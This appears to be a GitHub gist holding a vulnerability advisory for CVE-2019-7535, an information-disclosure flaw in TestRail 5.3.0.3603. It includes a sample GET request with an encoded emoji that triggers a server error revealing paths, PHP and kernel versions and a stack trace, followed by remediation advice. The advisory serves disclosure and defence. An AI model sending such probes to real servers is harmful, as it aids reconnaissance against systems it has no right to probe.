Instantly share code, notes, and snippets.

Embed
What would you like to do?
CVE-2019-7535
[Description]
Gurock TestRail 5.3.0.3603 returns potentially sensitive information for an invalid request, as
demonstrated by full path disclosure and the identification of PHP as the backend technology.
------------------------------------------
[Additional Information]
* Make sure that your web server does not send out response that
reveal information about the backend technology type or version.
* Make sure that your web application processes user input correctly,
and that a generic response is always returned for all the
resources that don't exist/are disallowed in order to confuse
attackers.
------------------------------------------
[VulnerabilityType Other]
Information Disclosure
------------------------------------------
[Vendor of Product]
Gurock
------------------------------------------
[Affected Product Code Base]
TestRail - 5.3.0.3603
------------------------------------------
[Affected Component]
affected sys/core/uri.php script
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
Example:
```
GET /index.php?%F0%9F%92%A9 HTTP/1.1
Host: testrail
```
In html source code:
```
Details: <missing>
File: /var/www/testrail/sys/core/uri.php
Line: 88
Status Code: 500
Host: testrail
Uri: /index.php?%F0%9F%92%A9 (GET)
Browser: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
PHP: 5.3.3
Server: Linux 2.6.32-042stab120.3 #1 SMP Thu Oct 20 18:18:21 MSK 2016 x86_64
Trace:
at Uri_core::_parse (uri.php:88)
at Uri_core->_parse (uri.php:22)
at Uri_core->init (services.php:90)
at ServicesImpl->_create (services.php:59)
at ServicesImpl->get (services.php:77)
at ServicesImpl->_create (services.php:59)
at ServicesImpl->get (services.php:27)
at Services::get (gizmo.php:72)
at require_once (index.php:106)
Version: 5.3.0.3603"
```
------------------------------------------
[Reference]
https://www.gurock.com/testrail
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment